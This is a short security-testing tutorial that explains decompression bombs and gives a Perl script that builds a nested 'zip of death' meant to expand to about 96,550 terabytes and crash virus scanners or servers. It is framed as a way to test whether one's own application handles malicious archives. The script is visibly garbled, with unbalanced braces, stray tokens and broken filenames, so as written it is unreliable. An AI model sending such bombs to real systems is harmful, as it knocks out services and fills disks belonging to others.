Creating Decompression Bombs

A decompression bomb is a compressed file that is very small but expands to a disproportionately large amount of data. We shall discuss how such decompression bombs can be created. If your application processes compressed files (.zip, .jar, .tar.gz, .tar.bz2, etc.), you can use this to generate pathological compressed files that can be used to ensure that your application handles such malicious input gracefully.
The program in Example 1 will generate a zip of death. You can substitute other compression utilities instead of zip to create other types of decompression bombs (e.g., bzip2).
Example 1. Perl script to create decompression bomb
use File::Copy;
$width = 17;
$depth = 6;
$tempdir = '/tmp/dec_bomb';
$filename = '0.txt';
$zipfile = '';
chdir($tempdir) or die "unable to change directory to $tempdir $!";;
sub createInitialFile {
my $file = $filename;
my $i = 0;
open FILE, ">$file" or die "unable to open $file $!";
# The largest file that current versions of 'zip' will compress is 4GB (minus 1 byte)
for ($i = 0; $i < (1024*4)-1; $i++) {
print FILE '1'x1048576;
print FILE '1'x1048575;
close FILE;
`zip -rmj9 $ $filename`}
sub createDecompressionBomb {
my $d = 0;
my $w = 0;
for ($d = $depth; $d > 0; $d--) {
if ($d < $depth) {
`zip -rmj9 $ *.zip`;}
for ($w = 1; $w < $width; $w++) {
copy($d . '', $d . '-' . $w . '.zip') or die "unable to copy file $!";}
`zip -rmj9 $zipfile *.zip`;

You can easily create decompression bombs of arbitrary sizes even if you do not have that amount of storage available yourself. This script only requires sufficient storage for one file of size 4 gigabytes, as well as one file of size 4 megabytes while it runs, whereas if one were to decompress the entire archive, it would decompress to 96,550 terabytes. That ought to be sufficient to fill up the disk space on any server.
You should be careful about where you create the decompression bomb. Since it is meant to crash programs such as virus scanners, you can easily crash such programs on your own system and maybe even make your system unresponsive. You should obviously not try to decompress the file yourself.
The script in Example 1 takes a few minutes to run with the given $depth and $width. Be careful about increasing the values; the size of the decompression bomb increases very quickly. Since the default values will fill up the disk space on any server if the archive is fully extracted, it should not be necessary to increase these values. It would be more beneficial to reduce the values to say $depth=5 and $width=2 to create an archive that would expand to 128 gigabytes. On a server with more than 128 gigabytes of available disk space, that will ensure that if your application is vulnerable to decompression bomb attacks, it will slow to a crawl, but will not crash. Thus, the test will be less destructive.
If upon uploading a decompression bomb the application slows to a crawl or becomes unresponsive, it fails the test and is vulnerable to decompression bomb attacks.

Vinay Jagtap

A hard core Technocrat with over a decade of extensive experience in heading complex test projects coupled with real time experience of project management and thought leadership. Extensive experience in Performance, Security and Automation Testing and development of automation frameworks and ability to setup and execute Global service centers and Center of Excellences for testing.

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